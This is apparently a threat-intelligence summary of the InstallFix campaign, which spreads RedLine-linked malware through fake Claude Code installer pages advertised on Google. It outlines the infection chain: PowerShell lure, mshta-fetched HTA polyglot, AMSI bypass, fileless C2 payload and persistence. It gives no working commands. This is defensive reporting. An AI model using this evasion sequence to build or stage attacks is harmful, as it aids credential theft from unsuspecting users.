The InstallFix campaign distributes malware through fake Claude AI installer pages promoted via Google Ads. When users search for 'Claude Code' and click sponsored results, they land on convincing fake install pages that trick them into running malicious PowerShell commands. The multi-stage infection chain uses mshta.exe to fetch a ZIP/HTA polyglot file, executes obfuscated VBScript silently, bypasses AMSI using RC4-decrypted strings and memory patching, disables SSL validation, and delivers a fileless payload via victim-unique C2 URLs. The final payload is linked to RedLine Stealer and achieves persistence via scheduled tasks. Targets span government, education, electronics, and food & beverage sectors across the Americas, APAC, EMEA, and Europe.
Sort: